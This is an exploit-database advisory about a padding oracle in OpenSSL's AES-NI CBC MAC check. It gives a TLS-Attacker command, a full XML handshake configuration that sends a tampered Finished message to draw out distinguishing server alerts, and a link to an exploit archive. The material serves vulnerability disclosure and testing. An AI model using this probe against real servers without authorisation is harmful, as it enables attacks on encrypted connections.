OpenSSL Padding Oracle in AES-NI CBC MAC Check

2016.05.05
Credit: Juraj Somorovsky
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

TLS-Attacker: https://github.com/RUB-NDS/TLS-Attacker https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39768.zip You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows: java -jar TLS-Attacker-1.0.jar client -workflow_input rsa-overflow.xml -connect $host:$port The xml configuration file (rsa-overflow.xml) looks then as follows: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <workflowTrace> <protocolMessages> <ClientHello> <messageIssuer>CLIENT</messageIssuer> <includeInDigest>true</includeInDigest> <extensions> <EllipticCurves> <supportedCurvesConfig>SECP192R1</supportedCurvesConfig> <supportedCurvesConfig>SECP256R1</supportedCurvesConfig> <supportedCurvesConfig>SECP384R1</supportedCurvesConfig> <supportedCurvesConfig>SECP521R1</supportedCurvesConfig> </EllipticCurves> </extensions> <supportedCompressionMethods> <CompressionMethod>NULL</CompressionMethod> </supportedCompressionMethods> <supportedCipherSuites> <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA</CipherSuite> <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA</CipherSuite> <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA256</CipherSuite> <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA256</CipherSuite> </supportedCipherSuites> </ClientHello> <ServerHello> <messageIssuer>SERVER</messageIssuer> </ServerHello> <Certificate> <messageIssuer>SERVER</messageIssuer> </Certificate> <ServerHelloDone> <messageIssuer>SERVER</messageIssuer> </ServerHelloDone> <RSAClientKeyExchange> <messageIssuer>CLIENT</messageIssuer> </RSAClientKeyExchange> <ChangeCipherSpec> <messageIssuer>CLIENT</messageIssuer> </ChangeCipherSpec> <Finished> <messageIssuer>CLIENT</messageIssuer> <records> <Record> <plainRecordBytes> <byteArrayExplicitValueModification> <explicitValue> 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F </explicitValue> </byteArrayExplicitValueModification> </plainRecordBytes> </Record> </records> </Finished> <ChangeCipherSpec> <messageIssuer>SERVER</messageIssuer> </ChangeCipherSpec> <Finished> <messageIssuer>SERVER</messageIssuer> </Finished> </protocolMessages> </workflowTrace> It looks to be complicated, but it is just a configuration for a TLS handshake used in TLS-Attacker, with an explicit value for a plain Finished message (32 0x3F bytes). If you change the value in the Finished message, you will see a different alert message returned by the server.

References:

https://github.com/RUB-NDS/TLS-Attacker
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39768.zip
http://web-in-security.blogspot.ca/2016/05/curious-padding-oracle-in-openssl-cve.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top